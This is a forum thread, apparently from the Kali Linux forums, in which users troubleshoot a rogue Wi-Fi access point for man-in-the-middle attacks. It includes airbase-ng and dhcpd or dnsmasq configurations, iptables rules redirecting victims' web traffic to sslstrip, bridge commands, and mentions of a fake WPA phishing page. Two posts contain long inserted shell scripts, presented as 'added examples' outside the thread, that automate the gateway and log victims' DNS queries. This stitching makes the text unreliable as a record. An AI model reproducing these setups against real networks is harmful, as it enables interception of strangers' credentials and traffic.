
Thread: isc-dhcp-server to make a rogue AP for MITM with no script

  1. #1
    Join Date
    2013-May
    Posts
    5

    Question: isc-dhcp-server to make a rogue AP for MITM with no script

    Hi, I'm running Kali on an amd64 HDD install (GNOME) with two wireless cards, wlan0 and wlan1. I want to make a rogue AP so clients connect to it while I run sslstrip and other tools to collect info. I have been trying to set up a rogue AP with isc-dhcp-server and airbase-ng. I have tried a few things and have been able to get clients IPs, but they don't receive internet (wlan0 is connected to the internet and wlan1 will have the AP on it).

    So here is the ifconfig output:

    eth0 Link encap:Ethernet HWaddr 10:1f:74:0f:f1:cf
    UP BROADCAST MULTICAST MTU:1500 Metric:1
    RX packets:0 errors:0 dropped:0 overruns:0 frame:0
    TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

    lo Link encap:Local Loopback
    inet addr:127.0.0.1 Mask:255.0.0.0
    inet6 addr: ::1/128 Scope:Host
    UP LOOPBACK RUNNING MTU:65536 Metric:1
    RX packets:32 errors:0 dropped:0 overruns:0 frame:0
    TX packets:32 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:1920 (1.8 KiB) TX bytes:1920 (1.8 KiB)

    wlan0 Link encap:Ethernet HWaddr 38:59:f9:75:e3:ce
    inet addr:192.168.1.102 Bcast:192.168.1.255 Mask:255.255.255.0
    inet6 addr: fe80::3a59:f9ff:fe75:e3ce/64 Scope:Link
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:7079 errors:0 dropped:0 overruns:0 frame:0
    TX packets:2346 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:2604757 (2.4 MiB) TX bytes:429234 (419.1 KiB)

    wlan1 Link encap:Ethernet HWaddr 00:c0:ca:6c:a1:b3
    inet addr:192.168.1.103 Bcast:192.168.1.255 Mask:255.255.255.0
    inet6 addr: fe80::2c0:caff:fe6c:a1b3/64 Scope:Link
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:4741 errors:0 dropped:0 overruns:0 frame:0
    TX packets:11 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:622681 (608.0 KiB) TX bytes:1411 (1.3 KiB)

    So I run these commands:

    airmon-ng start wlan1 1
    airbase-ng -e rougeap -c 1 mon0
    ifconfig at0 up
    ifconfig at0 192.168.1.1 netmask 255.255.255.0
    route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -P FORWARD ACCEPT
    iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.1.102:80
    iptables -t nat -A POSTROUTING -j MASQUERADE
    dhcpd -d -f -cf /etc/dhcp/dhcpd.conf at0
    echo "1" > /proc/sys/net/ipv4/ip_forward

    My /etc/dhcp/dhcpd.conf is set up like this:

    ddns-update-style interim;
    authoritative;
    default-lease-time 600;
    max-lease-time 7200;
    subnet 192.168.1.0 netmask 255.255.255.0 {
    option subnet-mask 255.255.255.0;
    option broadcast-address 192.168.1.255;
    option domain-name-servers 8.8.8.8;
    option routers 192.168.1.255;
    range 192.168.1.100 192.168.1.254;
    }

    What am I doing wrong?

  2. #2
    Join Date
    2013-Apr
    Posts
    126
    Try these rules:
    Code:
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.102
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

  3. #3
    Join Date
    2013-Mar
    Location
    Totally lost
    Posts
    45
    Having both wlan0 and wlan1 on the same subnet could cause problems: put them on different subnets, e.g. 10.1.1.0/24 for your rogue AP.

    What are you trying to do with this line:
    "iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.1.102:80"?

  4. #4
    Join Date
    2013-May
    Posts
    5
    Hey vulpi, I love your PwnSTAR script. Is there any way you can show me how you set the server up? I've tried to go through your script to do it just like you, but I'm really bad at programming.

  5. #5
    Join Date
    2013-Mar
    Location
    Totally lost
    Posts
    45
    If your victims are getting ip addresses then your dhcp server is working. The problem is in the routing. You need 2 separate subnets. Remove the iptables line mentioned above. "option routers 192.168.1.255;" should be pointing to your fake ap, not to your home router.

    Clear the DNS cache in your victims, or browse to random nonsense addresses to avoid DNS caching. Don't introduce sslstrip until it's working without it.

    I know it's frustrating, but you'll learn more continuing to try it manually rather than blindly running scripts.

  6. #6
    Join Date
    2013-May
    Posts
    5
    Now I have it set up like this:

    airmon-ng wlan0 1
    airbase-ng -e rougeap -c 1 mon0
    ifconfig at0 up
    ifconfig at0 10.1.1.0 netmask 255.255.255.0
    route add -net 192.168.1.0 netmask 255.255.255.0 gw 10.1.1.0
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.102
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    dhcpd -d -f -cf /etc/dhcp/dhcpd.conf at0
    echo "1" > /proc/sys/net/ipv4/ip_forward

    So ifconfig looks like this:

    at0 Link encap:Ethernet HWaddr 00:12:23:34:45:56
    inet addr:10.1.1.0 Bcast:10.1.1.255 Mask:255.255.255.0
    inet6 addr: fe80::212:23ff:fe34:4556/64 Scope:Link
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:460 errors:0 dropped:0 overruns:0 frame:0
    TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:500
    RX bytes:95690 (93.4 KiB) TX bytes:468 (468.0 B)

    eth0 Link encap:Ethernet HWaddr 10:1f:74:0f:f1:cf
    UP BROADCAST MULTICAST MTU:1500 Metric:1
    RX packets:0 errors:0 dropped:0 overruns:0 frame:0
    TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

    lo Link encap:Local Loopback
    inet addr:127.0.0.1 Mask:255.0.0.0
    inet6 addr: ::1/128 Scope:Host
    UP LOOPBACK RUNNING MTU:65536 Metric:1
    RX packets:282 errors:0 dropped:0 overruns:0 frame:0
    TX packets:282 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:89557 (87.4 KiB) TX bytes:89557 (87.4 KiB)

    mon0 Link encap:UNSPEC HWaddr 00-C0-CA-6C-A1-B3-3A-30-00-00-00-00-00-00-00-00
    UP BROADCAST NOTRAILERS RUNNING PROMISC ALLMULTI MTU:1800 Metric:1
    RX packets:3266 errors:0 dropped:20 overruns:0 frame:0
    TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:495766 (484.1 KiB) TX bytes:0 (0.0 B)

    mon1 Link encap:UNSPEC HWaddr 00-C0-CA-6C-A1-B3-00-00-00-00-00-00-00-00-00-00
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:161 errors:0 dropped:0 overruns:0 frame:0
    TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:21502 (20.9 KiB) TX bytes:0 (0.0 B)

    wlan0 Link encap:Ethernet HWaddr 38:59:f9:75:e3:ce
    inet addr:192.168.1.100 Bcast:192.168.1.255 Mask:255.255.255.0
    inet6 addr: fe80::3a59:f9ff:fe75:e3ce/64 Scope:Link
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:7384 errors:0 dropped:0 overruns:0 frame:0
    TX packets:4947 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:9772691 (9.3 MiB) TX bytes:569542 (556.1 KiB)

    wlan1 Link encap:Ethernet HWaddr 00:c0:ca:6c:a1:b3
    inet6 addr: fe80::2c0:caff:fe6c:a1b3/64 Scope:Link
    UP BROADCAST MULTICAST MTU:1500 Metric:1
    RX packets:45 errors:0 dropped:0 overruns:0 frame:0
    TX packets:9 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:7740 (7.5 KiB) TX bytes:1220 (1.1 KiB)

    And the dhcpd.conf looks like this:

    ddns-update-style interim;
    authoritative;
    default-lease-time 600;
    max-lease-time 7200;
    subnet 192.168.1.0 netmask 255.255.255.0 {
    option subnet-mask 255.255.255.0;
    option broadcast-address 192.168.1.255;
    option domain-name-servers 8.8.8.8;
    option routers 10.1.1.0;
    range 192.168.1.100 192.168.1.254;
    }

  7. #7
    Join Date
    2013-May
    Posts
    5
    But I get this message:

    Wrote 0 leases to leases file.

    No subnet declaration for at0 (10.1.1.0).
    ** Ignoring requests on at0. If this is not what
    you want, please write a subnet declaration
    in your dhcpd.conf file for the network segment
    to which interface at0 is attached. **


    Not configured to listen on any interfaces!

  8. #8
    Join Date
    2013-Mar
    Location
    Totally lost
    Posts
    45
    I'm afraid you're still getting your home and fake-AP subnets mixed together. Perhaps sketch them out on paper first.

    "ifconfig at0 10.1.1.0 netmask 255.255.255.0
    route add -net 192.168.1.0 netmask 255.255.255.0 gw 10.1.1.0"

    "No subnet declaration for at0 (10.1.1.0)"
    "subnet 192.168.1.0 netmask 255.255.255.0 {"

    "please write a subnet declaration
    in your dhcpd.conf file for the network segment
    to which interface at0 is attached
    "

  9. #9
    Join Date
    2013-May
    Posts
    5
    So should it be one of these?

    ifconfig at0 10.1.1.0 netmask 255.255.255.0
    route add -net 192.168.1.0 netmask 255.255.255.0 gw 10.1.1.0

    ifconfig at0 10.1.1.0 netmask 255.255.255.0
    route add -net 10.1.1.0 netmask 255.255.255.0 gw 192.168.1.0

    ifconfig at0 192.168.1.0 netmask 255.255.255.0
    route add -net 192.168.1.0 netmask 255.255.255.0 gw 10.1.1.0

    ifconfig at0 192.168.1.0 netmask 255.255.255.0
    route add -net 10.1.1.0 netmask 255.255.255.0 gw 192.168.1.0

    And my dhcpd.conf is set up like this:

    ddns-update-style interim;
    authoritative;
    default-lease-time 600;
    max-lease-time 7200;
    subnet 10.1.1.0 netmask 255.255.255.0 {
    option subnet-mask 255.255.255.0;
    option broadcast-address 192.168.1.255;
    option domain-name-servers 8.8.8.8;
    option routers 10.1.1.0;
    range 10.1.1.100 10.1.1.254;
    }
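
    The replies above (posts #3, #5 and #8) all come down to the same two rules: the rogue AP needs its own subnet, distinct from the uplink's, and the gateway and broadcast addresses in dhcpd.conf must be real host/broadcast addresses of that subnet, not the network address. The script below is an added example, not code posted in this thread, that encodes those checks before writing the config and touching the interfaces. Everything in it is an assumption chosen for the example: at0 is the tap interface airbase-ng creates, wlan0 is the uplink with the thread's 192.168.1.102, the rogue subnet is 10.1.1.0/24 and this box is its gateway at 10.1.1.1.

```sh
#!/bin/sh
# Added example, not from the thread: rogue-AP gateway setup with the address
# sanity checks that would have caught the mistakes discussed above.
# All values below are assumptions for the example.
AP_IF=at0
UPLINK_IF=wlan0
UPLINK_ADDR=192.168.1.102    # wlan0's address; read it from ifconfig in practice
AP_NET=10.1.1.0
AP_PREFIX=24
AP_GW=10.1.1.1               # must be a host address inside AP_NET, not .0 or .255
AP_RANGE_LO=10.1.1.100
AP_RANGE_HI=10.1.1.254
DNS=8.8.8.8

# Dotted quad -> 32-bit integer, pure POSIX sh arithmetic.
ip2int() {
    _ifs=$IFS; IFS=.; set -- $1; IFS=$_ifs
    echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
}
# 32-bit integer -> dotted quad.
int2ip() {
    echo "$(( ($1 >> 24) & 255 )).$(( ($1 >> 16) & 255 )).$(( ($1 >> 8) & 255 )).$(( $1 & 255 ))"
}
# Prefix length -> netmask as integer / dotted quad (24 -> 255.255.255.0).
prefix2int()  { echo $(( (4294967295 << (32 - $1)) & 4294967295 )); }
prefix2mask() { int2ip "$(prefix2int "$1")"; }

# Classify ADDR relative to NET/PREFIX: prints net, broadcast, host or outside.
addr_role() {
    a=$(ip2int "$1"); n=$(ip2int "$2"); m=$(prefix2int "$3")
    if   [ $(( a & m )) -ne $(( n & m )) ];           then echo outside
    elif [ "$a" -eq "$n" ];                           then echo net
    elif [ "$a" -eq $(( n | (m ^ 4294967295) )) ];    then echo broadcast
    else echo host
    fi
}

# Refuse to continue with the thread's two classic mistakes.
check_config() {
    rc=0
    for addr in "$AP_GW" "$AP_RANGE_LO" "$AP_RANGE_HI"; do
        role=$(addr_role "$addr" "$AP_NET" "$AP_PREFIX")
        if [ "$role" != host ]; then
            echo "check: $addr is not a host address of $AP_NET/$AP_PREFIX (it is: $role)" >&2
            rc=1
        fi
    done
    if [ "$(addr_role "$UPLINK_ADDR" "$AP_NET" "$AP_PREFIX")" != outside ]; then
        echo "check: uplink $UPLINK_ADDR lies inside the rogue subnet; use two distinct subnets" >&2
        rc=1
    fi
    return $rc
}

# dhcpd.conf with every address derived from AP_NET/AP_PREFIX so they agree.
render_dhcpd_conf() {
    mask=$(prefix2mask "$AP_PREFIX")
    bcast=$(int2ip $(( $(ip2int "$AP_NET") | ($(prefix2int "$AP_PREFIX") ^ 4294967295) )))
    cat <<EOF
ddns-update-style none;
authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet $AP_NET netmask $mask {
  option subnet-mask $mask;
  option broadcast-address $bcast;
  option domain-name-servers $DNS;
  option routers $AP_GW;
  range $AP_RANGE_LO $AP_RANGE_HI;
}
EOF
}

# Address the AP side, NAT it out through the uplink, start dhcpd in the
# foreground. Needs root and an at0 already created by airbase-ng.
apply_network() {
    ifconfig "$AP_IF" "$AP_GW" netmask "$(prefix2mask "$AP_PREFIX")" up
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -F; iptables -t nat -F
    iptables -t nat -A POSTROUTING -o "$UPLINK_IF" -j MASQUERADE
    iptables -A FORWARD -i "$AP_IF" -o "$UPLINK_IF" -j ACCEPT
    iptables -A FORWARD -i "$UPLINK_IF" -o "$AP_IF" -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
    # No 'route add': the connected route for AP_NET appears with the address.
    dhcpd -d -f -cf /etc/dhcp/dhcpd.conf "$AP_IF"
}

case "${1:-check}" in
    check) check_config && render_dhcpd_conf ;;
    apply) check_config && render_dhcpd_conf > /etc/dhcp/dhcpd.conf && apply_network ;;
esac
```

    Run it with no argument to see the generated dhcpd.conf and any check failures, and with `apply` as root once airbase-ng has created at0. The port-80 REDIRECT for sslstrip is deliberately left out, as post #5 advises: get clients routing first, then add it.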

  10. #10
    Join Date
    2013-Jul
    Posts
    1
    I also got a lot of errors while using dhcpd, therefore I switched to dnsmasq; it works great. You should check it out here: http://www.techgeektricks.blogspot.i...-honeypot.html

  11. #11
    Join Date
    2013-Apr
    Posts
    1
    http://code.google.com/p/quickset/

    Take that and run with it. I probably need to update the dhcpd-type syntax within it due to a change that took place from BackTrack to Kali, but the end result is the same.

    Enjoy.

  12. #12
    Join Date
    2013-Jul
    Posts
    841
    The Musket Team has been running a phishing program from techdynamics on BT5R3; see ***REMOVED LINK****. We tried moving this program to Kali. We have been unable to run it through isc-dhcp-server; however, we easily got it to run through dnsmasq. We are working on the isc-dhcp-server problem but are running into the same wall as others on this forum, in that we cannot get it to pass through and show the fake AP page. We will probably rip Kali out and reinstall and see if we can get dnsmasq up and running on a dual-boot HD install.
    Concerning a dnsmasq install: we were only able to install dnsmasq (i.e. apt-get install dnsmasq) on a persistent USB running Kali which had been updated but not upgraded. We will publish the complete script rewrite and install instructions as soon as we clean up the script file and instructions prior to running.

    Our mistake is that dnsmasq is already installed in Kali. We simply did not find it in the normal places, and there was no config file in the /etc/ folder. However, if you type dnsmasq in a terminal window the program activates and a help file is available.
    We had to write a config file and save it as /etc/dnsmasq.conf. We started dnsmasq in the phishing program with dnsmasq -C /etc/dnsmasq.conf and the program worked perfectly. It provided the fake WPA error page and then passed the client on to the internet seamlessly; actually better than our BT5R3 solution. We used two (2) wifi receivers, one (1) in mon0 mode and another connected to the internet. We will publish the rewrite of the techdynamics approach applied to Kali soon.
    I would not waste time with isc-dhcp-server. It obviously works well with NetworkManager, but for phishing purposes here it is not worth the effort.
    Last edited by g0tmi1k; 2013-08-02 at 14:36. Reason: Youtube Rule
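
    The post above only says that a hand-written /etc/dnsmasq.conf started with `dnsmasq -C` did the job. As an added example, not the Musket Team's script, here is what such a file looks like for the same rogue-AP layout the thread is working towards (assumed: AP on at0, subnet 10.1.1.0/24, this box as gateway and resolver at 10.1.1.1, upstream DNS 8.8.8.8), together with a syntax check that does not start the daemon.

```sh
#!/bin/sh
# Added example, not from the thread: dnsmasq as DHCP + DNS for a rogue AP.
# Interface, subnet and addresses are assumptions chosen for the example.
render_dnsmasq_conf() {
    cat <<'EOF'
# Serve only the rogue-AP interface, never the uplink.
interface=at0
bind-interfaces
# Pool, netmask and lease time (ISC "range" + "max-lease-time").
dhcp-range=10.1.1.100,10.1.1.254,255.255.255.0,2h
# Option 3 = default gateway (ISC "option routers"); option 6 = DNS server.
# Pointing DNS at ourselves means every lookup is seen (and answerable) here.
dhcp-option=3,10.1.1.1
dhcp-option=6,10.1.1.1
# Forward to an upstream of our choosing instead of /etc/resolv.conf.
no-resolv
server=8.8.8.8
# Log queries and leases; on a rogue AP that log is the product.
log-queries
log-dhcp
EOF
}

# Write the config to a temp file and run dnsmasq's own parser over it.
# Returns dnsmasq's exit status (0 = OK); needs dnsmasq installed.
dnsmasq_syntax_check() {
    f=$(mktemp) || return 1
    render_dnsmasq_conf > "$f"
    dnsmasq --test -C "$f"; rc=$?
    rm -f "$f"
    return $rc
}

# Usage (as root, after airbase-ng has created at0 and it has 10.1.1.1):
#   render_dnsmasq_conf > /etc/dnsmasq.conf && dnsmasq -C /etc/dnsmasq.conf -d
# -d keeps dnsmasq in the foreground so its log is visible in the terminal.
```

    Unlike dhcpd, dnsmasq does not abort with "No subnet declaration" when the interface address and dhcp-range disagree; it simply never hands out leases, so `log-dhcp` and a quick look at `ifconfig at0` are the first things to check when clients get no address.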

  13. #13
    Join Date
    2013-Aug
    Posts
    2
    Wow, what a great thread. I've been having these issues as well, with my fake AP being broadcast but only limited connectivity. I know it has to do with the routing and having my fake AP assign an IP address. Also, do I have to be connected to the internet initially, or can I give my fake AP internet access without being connected to the internet myself? Would also like to know if I can just assign any IP addresses to clients through my fake AP. Still looking at this PwnSTAR script to try and figure out how you got the DHCP server running. Any guides on where the IPs are going in the script would be helpful. As you said before, I really want to learn this manually and understand what's going on behind the scenes instead of running a script; I would like to create my own scripts at some point as well.

  14. #14
    Join Date
    2013-Jun
    Posts
    45
    # ifconfig (wifi-bridge) up ???
    I don't see your wifi bridge in the ifconfig output...
    Maybe...

  15. #15
    Join Date
    2013-Aug
    Posts
    25
    Try the network sniffer in my script...

  16. #16
    Join Date
    2013-Aug
    Posts
    1
    Hi, I don't want to stop you building this yourself, but to save you some time, it's already been done. I helped write a script back in BT4 that did just this; it was only last night that I pulled it back out and made some amendments. The code is linked here:

    http://pastebin.com/GQKRzKDy

    Copy the whole script into a file (airssl.sh), then make it executable and run it. It will walk you through everything you need to do to create a fake AP, then route that traffic out to your gateway, leaving you MITM running sslstrip on the connection.

  17. #17
    Join Date
    2013-Jun
    Posts
    45
    This is a common, easy way to set up a rogue access point to do a MITM attack. The last step is very important and many times forgotten: bring the bridge up with ifconfig. If you do so, you should also be able to see the bridge when running ifconfig. # brctl show will list all available bridges and the interfaces connected to them.
    This way you don't need a script. Any client connected to the rogue access point should have an internet connection and the ability to use it.


    # airbase-ng --essid rogue -c (channel) -a (bssid) mon0 ==> for open authentication or [-W 1 (for wep)/ -W 1 -z 2 (for wpa)/ -W 1 -Z 2 (for wpa2)]
    # brctl addbr (wifi-bridge)
    # brctl addif (wifi-bridge) eth0
    # brctl addif (wifi-bridge) at0
    # ifconfig at0 0.0.0.0 up
    # ifconfig eth0 0.0.0.0 up
    # echo 1 > /proc/sys/net/ipv4/ip_forward
    # ifconfig (wifi-bridge) up

  18. #18
    Join Date
    2013-Mar
    Location
    Totally lost
    Posts
    45
    Still looking at this pwnstar script to try and figure out how you got the DHCP server running. Any guides on where the Ip's are going in the script would be helpful
    If you have any specific queries, post in the PwnSTAR thread (http://forums.kali.org/showthread.ph...unning-on-Kali) and I'll try to answer them.

  19. #19
    Join Date
    2013-Jul
    Posts
    841
    The Musket Team posted the download address for a WPA2 phishing script. See the Kali forums or the aircrack-ng forums, Programming (WPA Enterprise WPA2 phishing). The program works, but not as well as we would like, so we are continuing to improve it.

    We just completed install procedures on weakerthen4.2 and will publish install instructions as soon as we clean it up a bit.

    Concerning comments in this thread:

    1. Vaxel, the pastebin address http://pastebin.com/GQKRzKDy does not exist. We would like to see your work. If you can show the differences between the two different servers in Ubuntu versus Kali, that would be helpful.

    2. The bridging commands (brctl) are not part of Kali Linux. We went everywhere trying to find a download. Nothing worked. So we just played around with package names in apt-get and got a hit. This does work, from bridge-utils_1.5-6_i386.deb. Type

    apt-get install bridge-utils

    We have made a bridge, etc., so the commands do work. Now we have to learn how to use them, as they are just installed and we are unsure where this will go. You can google the command list easily. With the command list, the comments from leevai will make sense.

  20. #20
    Join Date
    2013-Jul
    Posts
    841
    Some Bridge Commands

    addbr <bridge>                      add bridge
    addif <bridge> <device>             add interface to bridge
    delbr <bridge>                      delete bridge
    delif <bridge> <device>             delete interface from bridge
    show                                show a list of bridges
    showbr <bridge>                     show bridge info
    showmacs <bridge>                   show a list of mac addrs

    setageing <bridge> <time>           set ageing time
    setbridgeprio <bridge> <prio>       set bridge priority
    setfd <bridge> <time>               set bridge forward delay
    setgcint <bridge> <time>            set garbage collection interval
    sethello <bridge> <time>            set hello time
    setmaxage <bridge> <time>           set max message age
    setpathcost <bridge> <port> <cost>  set path cost
    setportprio <bridge> <port> <prio>  set port priority
    stp <bridge> <state>                {dis,en}able stp
